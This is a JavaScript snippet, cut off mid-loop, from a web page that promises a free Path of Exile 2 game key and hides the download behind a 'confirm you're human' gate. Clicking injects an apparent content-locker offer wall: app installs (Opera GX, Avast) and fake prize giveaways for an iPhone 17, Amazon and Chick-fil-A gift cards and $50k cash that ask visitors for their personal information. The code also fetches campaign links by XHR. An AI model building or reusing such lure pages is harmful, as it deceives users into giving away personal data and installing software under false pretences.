var status=0;
document.getElementById("pokaz_overwall").onclick=function(e){
let htmlCode=`
Klucz do Path of Exile 2
1 0 1
Aby pobrać ten plik, potwierdź, że jesteś człowiekiem 1
Quick install: Opera GXQuick install: Opera GX Browser
Download Avast Antivirus!Protect your device with Avast Antivirus. Simply install the app and open it to benefit from its comprehensive security features. Enjoy peace of mind knowing your system is safeguarded against various threats.
Have a chance to Win new iPhone 17!Input your information to have a chance to win a new iPhone 17!
Win Amazon $1,000 Gift Card!Enter Your Information to Have a Chance to Win Amazon $1,000 Gift Card!
Have a chance to get a $100 Chick Fil A Gift Card!Have a chance to get a $100 Chick Fil A Gift Card!
Win $50k Cash!Enter Your Information to have a chance to Win $50k!
`;
if(status==0)
e.srcElement.parentElement.insertAdjacentHTML('beforeend',htmlCode)
status=1
document.getElementById("conversandMobile").onclick=function(e){
document.getElementById("KampMobile").removeAttribute("hidden")
document.getElementById("KampHTML").setAttribute("hidden",1)
}
document.getElementById("conversandWEB").onclick=function(e){
document.getElementById("KampMobile").setAttribute("hidden",1)
document.getElementById("KampHTML").removeAttribute("hidden")
}
var ost_spr="2026-03-07 13:18:06"
const xhttp = new XMLHttpRequest();
xhttp.onload = function() {
var json=JSON.parse(this.response);
var conversand_suma=document.getElementById("conversand_suma")
conversand_suma.innerHTML=json.suma;
var btn_link=document.getElementsByClassName("btn_link")
for(var i=0;i